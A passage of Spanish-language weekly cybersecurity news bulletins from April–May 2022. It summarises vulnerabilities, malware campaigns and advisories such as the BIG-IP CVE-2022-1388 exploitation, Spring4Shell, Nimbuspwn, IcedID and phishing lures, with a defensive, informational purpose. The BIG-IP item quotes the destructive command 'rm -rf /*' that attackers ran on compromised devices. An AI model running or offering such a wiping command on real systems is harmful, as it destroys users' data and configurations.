compromiso de dispositivos de Internet of Things (IoT) con los que generar su red de bots para emitir ataques de DDoS. Dentro de su análisis, Microsoft especifica que han observado que, dispositivos infectados con XorDDoS, más tarde son vulnerados con el backdoor Tsunami, que a su vez despliega el cripotominero XMRing. Dentro de las TTPs empleadas por XorDDoS, destaca el uso de la fuerza bruta contra servicios SSH accesibles como principal vector de entrada para conseguir permisos de root en la máquina vulnerada. Además, cuenta con módulos destinados a la evasión de sistemas de seguridad, ocultando su actividad, lo que le hace más difícilmente detectable. Desde Microsoft aportan recomendaciones para tratar de combatir esta amenaza. Más info: https://www.microsoft.com/security/blog/2022/05/19/rise-in-xorddos-a-deeper-look-at-the-stealthy-ddos-malware-targeting-linux-devices/ CISA expone los vectores de entrada más utilizados La CISA, en conjunto con autoridades de Estados Unidos, Canadá, Nueva Zelanda, Países Bajos y Reino Unido, ha publicado un aviso sobre controles y prácticas de seguridad que son habitualmente utilizados como acceso inicial durante los compromisos a posibles víctimas. En este sentido destacan que los cibercriminales suelen aprovechar configuraciones de seguridad deficientes (mal configuradas o desprotegidas), controles débiles y otras malas prácticas como parte de sus tácticas para comprometer sistemas. Algunas de las Tácticas, Técnicas y Procedimientos (TTPs) más utilizados serían: la explotación de una aplicación expuesta al público [T1190], servicios remotos externos [T1133], phishing [T1566], aprovechar una relación de confianza [T1199] o explotar cuentas válidas [T1078]. Con el objetivo de evitar estas técnicas, se resume dentro del aviso una serie de prácticas recomendadas para proteger los sistemas de estos posibles ataques, destacando el control de acceso, refuerzo de credenciales, establecer una gestión centralizada de registros, el uso de antivirus, herramientas de detección, operar los servicios expuestos con configuraciones seguras, así como mantener el software actualizado. Más info: https://www.cisa.gov/uscert/ncas/alerts/aa22-137a
20 de mayo de 2022
Boletín semanal de ciberseguridad, 7—13 de mayo
Vulnerabilidad en BIG-IP explotada para el borrado de información El pasado 4 de mayo F5 corregía entre otras, una vulnerabilidad que afectaba a dispositivos BIG-IP (CVE-2022-1388 CVSSv3 9.8), que podría permitir a un atacante no autenticado con acceso de red al sistema BIG-IP, mediante direcciones IP propias o un puerto de administración, ejecutar comandos arbitrarios, eliminar o crear archivos, o deshabilitar servicios. La gravedad del fallo planteaba en ese momento la necesidad de parchear, y múltiples investigadores de seguridad empezaban a alertar de la posibilidad de que se publicasen pruebas de concepto sin demora. Tan solo unos días más tarde, firmas de seguridad como Horizon3 o Positive Technologies, e investigadores de seguridad, confirmaban el desarrollo de exploits funcionales para el fallo. Desde entonces se viene reportando la explotación masiva, fundamentalmente para descargar webshells que permiten acceso inicial a las redes, para el robo de claves SSH, y para la enumeración de información de los sistemas. Por otro lado, investigadores de SANS Internet Storm Center han alertado de la detección en sus honeypots de varios ataques que ejecutan el comando rm -rf /* en los dispositivos BIG-IP. Este comando está enfocado al borrado de todos los archivos, incluidos los archivos de configuración que permiten que el dispositivo funcione correctamente, puesto que el exploit otorga al atacante privilegios de root en el sistema operativo Linux de los dispositivos. Este tipo de ataques también ha sido confirmado por el investigador de seguridad Kevin Beaumont, quien alerta de la desaparición de múltiples entradas en Shodan de esta clase de dispositivos. Más info: https://www.bleepingcomputer.com/news/security/critical-f5-big-ip-vulnerability-exploited-to-wipe-devices/ * * * Microsoft corrige tres vulnerabilidades 0-day Microsoft ha publicado su boletín de seguridad mensual correspondiente al mes de mayo en el que ha corregido un total de 75 fallos, incluyendo 3 vulnerabilidades 0-day, una de las cuales estaría siendo explotada activamente, y 8 vulnerabilidades críticas que podrían permitir la ejecución remota de código o elevar privilegios en el sistema vulnerable. El 0-day activamente explotado, categorizado como CVE-2022-26925, es una vulnerabilidad de spoofing en Windows LSA, que podría ser explotada por un atacante no autenticado, mediante la llamada a un método en la interfaz LSARPC, y forzar al controlador de dominio a autenticarse a través del protocolo de seguridad Windows NT LAN Manager (NTLM). Según indica su descubridor, el investigador de seguridad Raphael John, este fallo estaría siendo explotado y parece ser un nuevo vector de ataque para PetitPotam, ataque de retransmisión NTLM descubierto en julio de 2021. Los otros dos fallos 0-day corresponden con una vulnerabilidad de denegación de servicio en Windows Hyper-V (CVE-2022-22713) y un fallo en el controlador Magnitude Simba Amazon Redshift ODBC (CVE-2022-29972, también conocido como SynLapse). Desde Microsoft recomiendan aplicar las actualizaciones de seguridad lo antes posible. Más info: https://msrc.microsoft.com/update-guide/releaseNote/2022-May * * * CNPIC alerta de un posible ciberataque en infraestructuras críticas El Centro Nacional de Protección de Infraestructuras Críticas y Ciberseguridad (CNPIC) de España habría enviado un aviso de seguridad a empresas consideradas infraestructuras críticas del país. De esta forma se habrían puesto en alerta ante el riesgo de un posible ciberataque a empresas de sectores críticos como son el energético, comunicaciones, financiero, entre otros. Esta alerta implica que las empresas extremen las precauciones y mecanismos de protección dentro de su infraestructura informática para poder hacer frente a un posible ciberataque de manera preventiva, y evitar que se produzca una posible disrupción de servicios que pudiera afectar al funcionamiento de los servicios. Por el momento se desconoce el tipo de amenaza concreta que podría causar el posible ciberataque, así como la atribución, aunque la finalidad parece indicar ser la disrupción de servicios estratégicos. Más info: https://www.lainformacion.com/empresas/alerta-maxima-en-las-infraestructuras-espanolas-por-riesgo-de-ciberataques/2866557/ * * * Expuesta una base de datos con cerca de 21 millones de usuarios VPN Investigadores de vpnMentor han informado acerca de la filtración en Telegram de una base de datos Cassandra que contendría 21 millones de registros únicos de usuarios de servicios de VPN. El archivo, inicialmente comercializado en la dark web durante el año 2021, habría sido compartido desde el pasado 7 de mayo de manera gratuita a través de la aplicación de mensajería. En total se trata de 10 GB de información donde se incluyen datos de usuarios de servicios de VPN gratuitos conocidos como GeckoVPN, SuperVPN y ChatVPN. Entre los datos expuestos se encontrarían nombres de usuario, correos electrónicos, nombres personales, países, detalles de facturación, cadenas de contraseñas generadas de forma aleatoria, o el periodo de validez de la cuenta. Los investigadores que han analizado la base de datos destacan dos aspectos: que el 99,5% de las cuentas son direcciones de Gmail, lo que indica que es posible que esta base de datos sea únicamente un fragmento de los datos comprometidos; y que las contraseñas eran hashes, salt o contraseñas aleatorias, lo cual apunta a que cada una es distinta y la tarea de descifrado de las mismas se torna más complicada. Más info: https://www.vpnmentor.com/blog/vpns-leaked-on-telegram/ * * * Nueva campaña de distribución de Nerbian RAT Investigadores de Proofpoint han detallado una campaña de distribución de un malware al que han denominado Nerbian RAT (Remote Access Trojan), por una referencia al lugar ficticio (Nerbia) de la novela El Quijote en una de las funciones del malware. Se trata de un nuevo RAT que emplea múltiples librerías escritas en Go, un lenguaje de programación cada vez más utilizado para el desarrollo de malware, y que incluye múltiples componentes enfocados a la evasión de su detección. En la campaña observada se estaría suplantando a la Organización Mundial de la Salud (OMS) en correos de malspam que contienen supuesta información relacionada con la COVID-19. En estos mails se incluyen un documento Word adjunto cuya habilitación de macros desencadenará la descarga de un archivo .bat que se encarga de ejecutar un comando de PowerShell para conectar con el “Command & Control”. Consecuentemente, se descargará finalmente el ejecutable que actúa como dropper de Nerbian RAT. La campaña llevaría activa desde el pasado 26 de abril y se habría dirigido fundamentalmente contra entidades en Italia, España y Reino Unido. Más info: https://www.proofpoint.com/us/blog/threat-insight/nerbian-rat-using-covid-19-themes-features-sophisticated-evasion-techniques
13 de mayo de 2022
Boletín semanal de ciberseguridad, 30 de abril — 6 de mayo
TLStorm 2 - Vulnerabilidades en conmutadores Aruba y Avaya Investigadores de Armis han descubierto cinco vulnerabilidades en la implementación de comunicaciones TLS en múltiples modelos de conmutadores de Aruba y Avaya. En concreto, las vulnerabilidades se producen por un error de diseño similar a las vulnerabilidades TLStorm, descubiertas también por Armis a principios de año, que podrían permitir a un actor malicioso ejecutar código de forma remota en los dispositivos, afectando a potencialmente millones de dispositivos de infraestructura de red a nivel empresarial. La causa del problema es debido a que el código que utilizan los proveedores no cumple con las pautas de la librería NanoSSL, por lo que en Aruba puede provocar desbordamientos de datos por las vulnerabilidades rastreadas como CVE-2022-23677 y CVE-2022-23676, con CVSS de 9.0 y 9.1 respectivamente. Por otro lado, en Avaya, la implementación de la librería presenta tres fallos, un desbordamiento de reensamblaje de TLS (CVE-2022-29860 y CVSS de 9.8), desbordamiento de análisis de encabezado HTTP (CVE-2022-29861 y CVSS de 9.8) y un desbordamiento en el manejo de peticiones HTTP POST, sin CVE asignado. Asimismo, de explotarse las vulnerabilidades de manera satisfactoria, podría producir desde fugas de información, la toma completa del dispositivo, hasta el movimiento lateral y la anulación de las defensas de segmentación de la red. Desde Armis destacan que la infraestructura de la red en sí misma está en riesgo y es explotable por los atacantes, lo que significa que la segmentación de la red ya no puede considerarse una medida de seguridad suficiente. Más info: https://www.armis.com/blog/tlstorm-2-nanossl-tls-library-misuse-leads-to-vulnerabilities-in-common-switches/ * * * Millones de dispositivos IoT afectados por un error grave en el sistema DNS El equipo de Nozomi Networks Labs ha descubierto una vulnerabilidad no parcheada que afecta directamente al sistema de nombres de dominio (DNS) de múltiples enrutadores y dispositivos IoT, implementados en varios sectores de la infraestructura crítica. Concretamente, el fallo detectado se ubica en dos librerías C (uClibc y uClibc-ng) de uso muy común en productos IoT, empleadas por distribuciones de Linux como Embedded Gento, y ampliamente utilizadas por los principales proveedores como Netgear, Axis y Linksys. Según la investigación, un actor amenaza podría usar el envenenamiento de DNS o la suplantación de DNS para redirigir el tráfico de red a un servidor bajo su control directo y, por lo tanto, robar o manipular la información transmitida por los usuarios y realizar otros ataques contra los dispositivos para comprometerlos por completo. Nozomi calcula que más de 200 proveedores podrían verse afectados por esta vulnerabilidad, sin identificador CVE por el momento, y teniendo en cuenta que actualmente no existe parche que la solucione, los detalles técnicos concretos sobre su explotación no han sido publicados hasta que se encuentren disponibles nuevas versiones de firmware que corrijan el problema. Más info: https://www.nozominetworks.com/blog/nozomi-networks-discovers-unpatched-DNS-bug-in-popular-c-standard-library-putting-iot-at-risk/ * * * Vulnerabilidades graves en AVAST y AVG El equipo de SentinelOne descubrió en diciembre de 2021 dos vulnerabilidades graves catalogadas como CVE-2022-26522 y CVE-2022-26523, en los antivirus de Avast y AVG. Estas vulnerabilidades habrían estado presentes para su explotación en los productos desde el año 2012 y afectaban al sistema “Anti Rootkit” de ambos productos. Los fallos permitían a actores maliciosos explotar la conexión de socket en el controlador del kernel para escalar privilegios y así lograr deshabilitar los productos de seguridad, posibilitando la sobreescritura de los componentes del sistema, corromper el sistema operativo y/o realizar operaciones maliciosas sin obstáculos, como inyectar código, realizar movimientos laterales, instalar backdoors, etc. Ambas vulnerabilidades fueron parcheadas con la versión 22.1 del antivirus Avast (AVG fue adquirido por el propio Avast en 2016), lanzada el pasado 8 de febrero. Finalmente, cabe destacar que a pesar del tiempo en el que han existido estas vulnerabilidades, no se han detectado indicios de explotación. Más info: https://www.sentinelone.com/labs/vulnerabilities-in-avast-and-avg-put-millions-at-risk/ * * * Vulnerabilidad en varias familias de ransomware podría evitar el cifrado de información El investigador de seguridad John Page (hyp3rlinx) ha demostrado que varias de las familias de ransomware con mayor actividad reciente, son vulnerables a un fallo del tipo “secuestro de DLL” que impediría el propósito final de cifrar la información de sus víctimas. Los detalles de su investigación han sido publicados a través del proyecto Malvuln, creado por el propio investigador, donde cataloga vulnerabilidades detectadas en muestras de malware. La explotación del fallo detectado consiste en un secuestro de DLL, un tipo de vulnerabilidad que generalmente se utiliza con fines de ejecución de código arbitrario y escalada de privilegios. En este caso, mediante la creación de un archivo DLL especialmente diseñado que suplanta a la DLL necesaria para la ejecución del malware, se interceptarían y finalizarían los procesos del ransomware, evitando así el cifrado de la información. Por el momento, Malvuln ha publicado algunas pruebas de concepto (PoC) que afectan a las familias de ransomware Conti, REvil, Loki Locker, Black Basta, AvosLocker, LockBit y WannaCry, sin descartar que el fallo también sea perfectamente explotable en otros ransomware. Más info: https://www.malvuln.com/
6 de mayo de 2022
Boletín semanal ciberseguridad 22 – 29 de abril
Nueva campaña maliciosa de distribución de RedLine Investigadores de BitDefender han publicado un informe sobre una nueva campaña de distribución del malware RedLine. Según los analistas, actores maliciosos estarían haciendo uso de RIG Exploit Kit para su distribución, el cual habría incorporado el aprovechamiento de una vulnerabilidad en Internet Explorer que provoca daños en la memoria cuando la víctima accede a un sitio web especialmente diseñado. Concretamente se trata del fallo identificado como CVE-2021-26411 con un CVSSv3 de 7.8, el cual fue parcheado por Microsoft en marzo de 2021. Posteriormente, una vez aprovechada la vulnerabilidad, el kit distribuye RedLine colocando un archivo JavaScript en un directorio temporal, que a su vez descarga un segundo payload cifrado con RC4, generando el proceso de infección final en el equipo de la víctima. Cabe destacar que, según indicó al medio digital The Record, Bogdan Botezatu, director de investigaciones en Bitdefender, durante el mes de abril identificaron únicamente con sus soluciones un total de 10.000 ataques de RedLine alrededor del mundo, lo que denota la amplia utilización de este malware para la realización de incidentes de ciberseguridad. Más info: https://media.telefonicatech.com/telefonicatech/uploads/2021/1/154425_Bitdefender-PR-Whitepaper-RedLine-creat6109-en-EN.pdf Escalada de privilegios en el directorio activo de Windows La firma de seguridad SOCPRIME ha publicado un artículo donde establece que investigadores de seguridad han revelado la existencia de un fallo en el Directorio Activo (AD) de Windows en entornos en los que se utilice la configuración predeterminada. Este error, podría permitir a un usuario con acceso añadir máquinas al dominio sin necesidad de privilegios de administrador, pudiendo desencadenar en una escalada de privilegios en el sistema vulnerable. Este error, del que existe prueba de concepto, se podría explotar utilizando la herramienta KrbRelayUp. Una posible mitigación requeriría cambiar la configuración por defecto y eliminar los usuarios autentificados de la política de controladores de dominio por defecto. Se pueden encontrar más detalles sobre la mitigación de la vulnerabilidad en el repositorio de la investigación de Mor Davidovich. Nimbuspwn: vulnerabilidades de escalada de privilegios en Linux El equipo de investigadores de Microsoft ha identificado dos nuevas vulnerabilidades, denominadas Nimbuspwn, que podrían permitir a un atacante elevar privilegios a root en sistemas Linux vulnerables. En concreto, estos fallos han sido identificados como CVE-2022-29799 y CVE-2022-29800, y se encuentran en el componente networkd-dispatcher, cuya función es realizar cambios en el estado de la interfaz de red. Según los investigadores, la explotación encadenada de dichas vulnerabilidades permitiría a actores maliciosos alcanzar privilegios de root dando la posibilidad, en fases posteriores, de implementar payloads, backdoors, distribuir malware y/o realizar otras acciones maliciosas a través de la ejecución arbitraria de código. En último lugar, cabe indicar que Clayton Craft, administrador del componente networkd-dispatcher, ha implementado las correspondientes correcciones y se recomienda a los usuarios que actualicen sus instancias para prevenir posibles ataques. Más info: https://www.microsoft.com/security/blog/2022/04/26/microsoft-finds-new-elevation-of-privilege-linux-vulnerability-nimbuspwn/
29 de abril de 2022
Boletín semanal de ciberseguridad 16–22 de abril
Fodcha: nueva botnet DDoS Investigadores de 360netlab y del CNCERT han descubierto una nueva botnet enfocada a la realización de ataques de denegación de servicio, que se estaría expandiendo rápidamente en Internet. A esta nueva botnet la han denominado Fodcha, puesto que el primer C2 se encontraba en el dominio folded[.]in, y puesto que emplea el algoritmo ChaCha para cifrar el tráfico de red. Su propagación se realiza mediante la explotación de vulnerabilidades n-day en productos Android, GitLab, Realtek Jungle SDK, Zhone Router o Totolink Routers entre otros; así como mediante el compromiso de contraseñas débiles de Telnet/SSH gracias en parte a la utilización de la herramienta de ataques de fuerza bruta Crazyfia. El inicio de la actividad de Fodcha se remonta al mes de enero, con un pico importante de ataques registrado el pasado 1 de marzo, pero, sin embargo, la actividad se habría intensificado a partir de finales de marzo. Precisamente, en torno al 19 de marzo se producía un cambio en las versiones de la botnet, derivada según los investigadores a un cierre en los servidores antiguos por parte de los proveedores en la nube. Más info: https://blog.netlab.360.com/fodcha-a-new-ddos-botnet/ INCONTROLLER/PIPEDREAM nuevo malware contra entornos ICS/SCADA Recientemente se ha descubierto un nuevo malware dirigido contra sistemas de control industrial (ICS) y sistemas de supervisión, control y adquisición de datos (SCADA), que podría dar lugar a interrupciones, degradación o incluso la destrucción de los sistemas. Investigadores de Mandiant han catalogado este malware como INCONTROLLER, mientras que el equipo de Dragos lo ha bautizado como PIPEDREAM, señalando asimismo, que este habría sido desarrollado por el actor amenaza CHERNOVITE. Este malware destaca por disponer de un conjunto de herramientas para atacar a los sistemas de sus víctimas, de igual modo no explota una vulnerabilidad específica, sino que se aprovecha de funcionalidades nativas de los sistemas ICS afectados, por ello tanto los investigadores como varias agencias de seguridad norteamericanas (CISA, el FBI y la CSA) han publicado una serie de medidas para la detección y protección. Cabe destacar, si bien, que en las investigaciones se ha detectado que el malware podría dirigirse a diferentes fabricantes, este tiene módulos desarrollados específicamente para los controladores logísticos programables (PLC) Schneider Electric y Omron. Más info: https://media.telefonicatech.com/telefonicatech/uploads/2021/1/154019_Dragos_ChernoviteWP_v2b.pdf HOMAGE: vulnerabilidad zero-click en iOS utilizada en campaña de espionaje El equipo de The Citizen Lab ha publicado una investigación donde detallan una campaña de espionaje llevada a cabo entre los años 2017 y 2020 a la que han denominado Catalangate, y que implicaba el aprovechamiento de varias vulnerabilidades en iOS. Lo más relevante es la utilización de un nuevo exploit para una vulnerabilidad de zero-click en iOS utilizada para infectar los dispositivos con un spyware perteneciente a NSO Group. Esta vulnerabilidad ha sido nombrada como HOMAGE, afectaba a un componente de iMessage y afectaba a versiones de iOS anteriores a la 13.1.3, habiendo sido corregida ya en iOS 13.2 (cabe destacar que la última versión estable de iOS es la 15.4). Asimismo, los investigadores también habrían detectado la utilización de otras vulnerabilidades: otra de zero-click descubierta en el año 2020 y denominada KISMET que afectaba a las versiones iOS 13.5.1 e iOS 13.7, así como otra en WhatsApp ya también parcheada CVE-2019-3568. Fruto de esta investigación, se ha detectado que al menos a 65 personas que habrían sido infectadas con los spyware Pegasus y Candiru. Más info https://citizenlab.ca/2022/04/catalangate-extensive-mercenary-spyware-operation-against-catalans-using-pegasus-candiru/ Vulnerabilidades en el formato de codificación de audio ALAC Investigadores de Check Point han anunciado la existencia de varias vulnerabilidades en Apple Lossless Audio Codec (ALAC), también conocido como Apple Lossless, un formato de codificación de audio. La explotación del fallo descubierto podría permitir a un atacante ejecutar código de forma remota en un dispositivo vulnerable si consigue engañar al usuario para que abra un archivo de audio manipulado; un ataque al que han denominado ALHACK. ALAC fue desarrollado inicialmente por Apple, y a finales de 2011 la firma lo convertía en open source, habiéndose incorporado desde entonces en multitud de dispositivos y programas. Desde su liberación, Apple ha actualizado la versión propietaria en varias ocasiones, pero el código compartido no ha sido parcheado desde entonces. Por lo tanto, es asumible que todos aquellos proveedores externos que usen el código inicial proporcionado por Apple en 2011 cuenten con una versión vulnerable. Según los investigadores, es precisamente lo que ocurría en el caso de Qualcomm y MediaTek, firmas que habrían incorporado el código vulnerable en los decodificadores de audio empleados por más de la mitad de los smartphones actuales. La divulgación de los fallos se ha realizado de forma responsable, por lo que antes de hacer público su descubrimiento, Check Point alertó a MediaTek y Qualcomm, corrigiendo ambas firmas las vulnerabilidades el pasado mes de diciembre de 2021: CVE-2021-0674 y CVE-2021-0675 en el caso de Mediatek y CVE-2021-30351 en el caso de Qualcomm. Los detalles técnicos de la vulnerabilidad se harán públicos el próximo mes de mayo en el congreso CanSecWest. Más info: https://blog.checkpoint.com/2022/04/21/largest-mobile-chipset-manufacturers-used-vulnerable-audio-decoder-2-3-of-android-users-privacy-around-the-world-were-at-risk/
22 de abril de 2022
Boletín semanal ciberseguridad 1 – 8 de abril
Vulnerabilidad crítica en GitLab permite acceso a cuentas de usuario GitLab ha publicado una actualización de seguridad que corrige un total de 17 vulnerabilidades entre las que destaca una vulnerabilidad crítica que afecta tanto a GitLab Community Edition (CE) como a Enterprise Edition (EE). Concretamente, se trata del fallo de seguridad CVE-2022-1162, puntuado con un CVSS de 9.1, que reside en el establecimiento de una contraseña codificada para las cuentas registradas con un proveedor de OmniAuth, posibilitando a actores maliciosos tomar el control de cuentas de usuarios utilizando estas contraseñas codificadas. Por el momento, se indica que no se han detectado evidencias del compromiso de ninguna cuenta explotando este fallo de seguridad. No obstante, GitLab ha publicado un script para ayudar a identificar qué cuentas de usuario estarían afectadas y recomienda a los usuarios actualizar, a la mayor brevedad posible, todas las instalaciones de GitLab a las últimas versiones (14.9.2, 14.8.5 o 14.7.7) para prevenir posibles ataques. Más info: https://about.gitlab.com/releases/2022/03/31/critical-security-release-gitlab-14-9-2-released/#script-to-identify-users-potentially-impacted-by-cve-2022-1162 Nuevas técnicas de Deep Panda: Log4Shell y rootkits Fire Chili firmados digitalmente Investigadores de Fortinet han identificado que el grupo APT Deep Panda estaría explotando la vulnerabilidad Log4Shell en los servidores VMware Horizon para implementar una puerta trasera y un nuevo rootkit en máquinas infectadas. El objetivo del grupo sería el robo de información de víctimas que pertenecen a industrias financiera, académica, cosmética y de viajes. En primer lugar, los investigadores evidencian que en la cadena de infección se aprovechó la falla de ejecución remota de código Log4j, en servidores VMware Horizon vulnerables para generar una cadena de etapas intermedias y, finalmente, implementar la puerta trasera denominada Milestone. Esta puerta trasera, también estaría diseñada para enviar información sobre las sesiones actuales en el sistema al servidor remoto. Por otro lado, se ha detectado la utilización de un rootkit del kernel denominado como Fire Chili, el cual está firmado digitalmente con certificados robados de compañías de desarrollo de juegos, permitiéndoles evadir detección, así como ocultar operaciones de archivos maliciosos, procesos, adiciones de claves de registro y conexiones de red. Asimismo, los investigadores también han atribuido el uso de Fire Chilli al grupo conocido como Winnti., indicando que es posible que los desarrolladores de estas amenazas hayan compartido recursos, como certificados robados e infraestructura Command&Control (C2). Más info: https://www.fortinet.com/blog/threat-research/deep-panda-log4shell-fire-chili-rootkits Campaña de phishing aprovecha supuestos mensajes de voz de WhatsApp Investigadores de Armorblox han reportado una campaña de phishing que utiliza como señuelo el envío de mensajes de voz de la plataforma de mensajería WhatsApp, con el fin de implementar malware en los dispositivos de las víctimas. Según la investigación, el ataque comienza con la distribución de correos electrónicos de phishing que simulan ser una notificación de WhatsApp que contiene un “mensaje privado” de audio, para lo que los actores maliciosos incluyen un botón de “Reproducir” incrustado en el cuerpo del correo junto a la duración del audio y su fecha de creación. En el momento que el usuario objetivo presiona la opción “Reproducir”, se le redirige a un sitio web que ofrece un mensaje de permiso/bloqueo que, mediante técnicas de ingeniería social, terminará por instalar el troyano JS/Kryptic y el payload necesario para, finalmente, implementar un malware del tipo stealer. Armorblox destaca que los envíos de los correos maliciosos se realizan desde cuentas legítimas previamente vulneradas, lo que dificulta en gran medida su posible detección por las diferentes herramientas de seguridad activas en la máquina objetivo. El objetivo final de la campaña es principalmente el robo de credenciales almacenadas en navegadores y aplicaciones, así como en carteras de criptomonedas, claves SSH e incluso archivos almacenados en los equipos de las víctimas. Más info: https://www.bleepingcomputer.com/news/security/whatsapp-voice-message-phishing-emails-push-info-stealing-malware/ Cicada: nueva campaña de espionaje El equipo de investigadores de Symantec ha publicado una investigación en la que informa sobre una sofisticada campaña de espionaje de larga duración llevada a cabo por el grupo de cibercriminales denominado Cicada (aka APT10). Según los expertos, dicha campaña estaría activa desde mediados de 2021 hasta febrero del presente año, habiendo centrado sus operaciones contra entidades gubernamentales y ONGs de Asia, América y Europa. No obstante, también se han impactado otros sectores como telecomunicaciones, entidades legales y farmacéuticas. Se estima que el vector de entrada sería la explotación de una vulnerabilidad conocida en servidores de Microsoft Exchange sin parchear, sin especificarse ninguna en concreto. Tras el compromiso inicial, Cicada despliega software malicioso como el backdoor Sodamaster, herramienta asociada a este actor y que ha permitido su atribución, un loader personalizado a través del reproductor legítimo VLC que incluye una DLL maliciosa, haciendo uso de la técnica DLL Side-Loading, Mimikatz para obtener credenciales, WinVNC para el control remoto o WMIExec para le ejecución de comandos. Más info: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-china-ngo-government-attacks Nuevas vulnerabilidades críticas en WMware VMware ha publicado un boletín donde corrige vulnerabilidades de severidad crítica, alta y media para sus productos VMware Workspace ONE Access (Access), VMware Identity Manager (vIDM), VMware vRealize Automation (vRA), VMware Cloud Foundation y vRealize Suite Lifecycle Manager. Las vulnerabilidades más críticas son las siguientes: CVE-2022-22954 CVSSSv3 9.8: vulnerabilidad de inyección de plantilla del lado servidor que puede derivar en ejecución remota de código. CVE-2022-22955/22956 CVSSv3 9.8: vulnerabilidades que permiten evadir la autenticación en el framework OAuth2 ACS. CVE-2022-22957/22958 CVSSv3 9.1: vulnerabilidades de ejecución remota de código a través de una URI JDBC maliciosa y que requieren acceso de administrador. Se han corregido también otras vulnerabilidades de criticidad alta (CVE-2022-22959 CVSSv3 8.8 y CVE-2022-22960 CVSSv3 7.8) y media (CVE-2022-22961 CVSSv3 5.3). Según la compañía, no se han detectado evidencias de que ninguna de estas vulnerabilidades esté siendo activamente explotada. Adicionalmente, VMware ha publicado una serie de medidas que los usuarios pueden tomar para mitigar el impacto de estas vulnerabilidades en aquellos casos en los que actualizar el software no sea posible. Más info: https://www.vmware.com/security/advisories/VMSA-2022-0011.html
8 de abril de 2022
Boletín semanal ciberseguridad 26 de marzo-1 de abril
Vulnerabilidad Spring4Shell Spring ha lanzado actualizaciones de seguridad para el fallo 0-day de ejecución remota de código (RCE) conocido como Spring4Shell. Desde la aparición de la vulnerabilidad, trascendió información sin confirmar por parte de diferentes investigadores y medios. Es por ello, que desde Spring han publicado los detalles concretos de la vulnerabilidad, así como se le ha asignado un CVE y se han publicado los parches que corrigen el fallo. La vulnerabilidad ha sido identificada con el CVE-2022-22965 y, a pesar de desconocerse por el momento su criticidad bajo la escala CVSS, es una vulnerabilidad de severidad crítica. Si bien el fallo puede ser aprovechado de múltiples formas, los desarrolladores de Spring han afirmado que para su explotación se requiere usar la versión de JDK 9 o superior, Apache Tomcat como contenedor de Servlets, estar empaquetado como WAR y tener dependencia con los frameworks spring-webmvc o spring-webflux. Las versiones vulnerables han sido confirmadas, por lo que se recomienda actualizar a Spring Framework 5.3.18 y 5.2.20 o superiores, y para Spring Boot a las versiones 2.6.6 y 2.5.12 o superiores. Del mismo modo han publicado una serie de mitigaciones para aquellos que no puedan desplegar las actualizaciones. Más info: https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement Campaña de phishing suplantando a organismos españoles La Oficina de Seguridad del Internauta (OSI) ha emitido un aviso de seguridad para informar acerca de una campaña de phishing que estaría suplantando a la Agencia Tributaria. Los correos electrónicos se estarían enviando desde una dirección spoofeada, mostrando el dominio @hacienda.hob.es, con el asunto “Comprobante fiscal digital – MINISTERIO DE HACIENDA Y FUCION PUBLICA”. Estos correos instan a las víctimas a descargar un supuesto archivo en formato .zip que contendría documentación pendiente de presentar ante el organismo público, pero en realidad contiene un malware. Desde la OSI indican que no se descarta la suplantación dentro de esta misma campaña de otros organismos gubernamentales, cambiando por tanto el asunto y el remitente de los correos. Asimismo, desde el Servicio de Digital Risk Protection se ha podido analizar esta campaña, detectando también la suplantación al Ministerio de Sanidad, y al Ministerio de Hacienda, e identificándose el malware distribuido como el troyano bancario Mekotio. Apple corrige vulnerabilidades 0-day activamente explotadas Apple ha publicado actualizaciones de seguridad donde solventa dos nuevas vulnerabilidades 0-day que estarían siendo activamente explotadas y afectando a sus productos IPhone, IPad y Mac. El primero de los fallos, clasificado como CVE-2022-22674, es una vulnerabilidad de escritura fuera de límites en el controlador de gráficos para Intel, que, de ser aprovechada, podría permitir la divulgación de información de la memoria del kernel. El segundo error, clasificado como CVE-2022-22675, corresponde también a una vulnerabilidad de escritura fuera de límites, pero en el componente AppleAVD. Los productos afectados son: macOS Monterey, iPhone 6s y posteriores, iPad Pro (todos los modelos), iPad Air 2 y posteriores, iPad de 5.ª generación y posteriores, iPad mini 4 y posteriores y iPod touch (7.ª generación). Ambos fallos han quedado resueltos con las versiones iOS 15.4.1, iPadOS 15.4.1 y macOS Monterey 12.3.1. Más información: https://support.apple.com/en-us/HT213220 Nueva campaña de distribución de IcedID Investigadores de Interzer y Fortinet han analizado una nueva campaña del malware IcedID, un troyano bancario modular detectado por primera vez en 2017, utilizado habitualmente en la distribución de ransomware. Esta campaña se ha distribuido mediante correos de phishing desde cuentas de correo legítimas que han sido previamente comprometidas, reutilizando hilos existentes, donde contienen adjuntos maliciosos. Asimismo, también se produce una variación con respecto al adjunto del mensaje, que a pesar de que sigue siendo un archivo ZIP protegido con contraseña, éste pasa a contener en lugar de documentos de office como suele ser habitual, una imagen ISO que contiene un archivo Windows LNK y una DLL que ejecuta el malware. La utilización de este tipo de archivos permite a los atacantes saltarse los controles Mark-of-the-Web y conseguir ejecutar el malware sin alertar al usuario. A partir del análisis de las cuentas comprometidas, los investigadores apuntan a servidores Exchange vulnerables y públicamente expuestos a ProxyShell, por lo que plantean que este puede ser el vector de entrada inicial a las cuentas que se estarían empleando en la campaña. La actividad se ha centrado en organizaciones del sector energético, sanitario, legal y farmacéutico. Finalmente se han observado solapamientos en algunas de las TTPS utilizadas que han asociado esta actividad a los actores TA577 y TA551. Todos los detalles: https://www.intezer.com/blog/research/conversation-hijacking-campaign-delivering-icedid/ Fraude a gran escala contra el sector retail Investigadores del medio Segurança Informática han publicado un análisis en profundidad de una campaña de fraude contra múltiples marcas del sector retail, activa desde finales de 2020, cuya actividad se habría visto incrementada desde principios de 2022. En este esquema fraudulento se han utilizado dominios similares a los originales de las marcas impactadas para distribuir phishing a través de anuncios maliciosos de Google, Instagram o Facebook. Todos los dominios maliciosos detectados, guardan algún tipo de similitud con los dominios legítimos de las organizaciones suplantadas, utilizando técnicas de typosquatting, seguidos de diferentes TLDs, entre los que destacan “.shop”, “.website” u “.online”. Una vez la víctima accedía a los anuncios, era redirigida a la página de fraude donde se encontraba grandes descuentos y ofertas y podía realizar un pedido online junto a un seguimiento del paquete. Los datos de la víctima eran recolectados para futuros fraudes, y en algunas ocasiones les llegaban paquetes llenos de basura. Los operadores utilizaron plantillas de sistemas de gestión de contenido (CMS) caseros que se encuentran publicados en GitHub, en los que, tras cambiar algunas imágenes, podían clonar cualquier marca. El mayor número de víctimas se ha concentrado en Italia, Chile o Portugal, seguido de otros países como España o Francia. Mediante estas operaciones los atacantes podrían haber 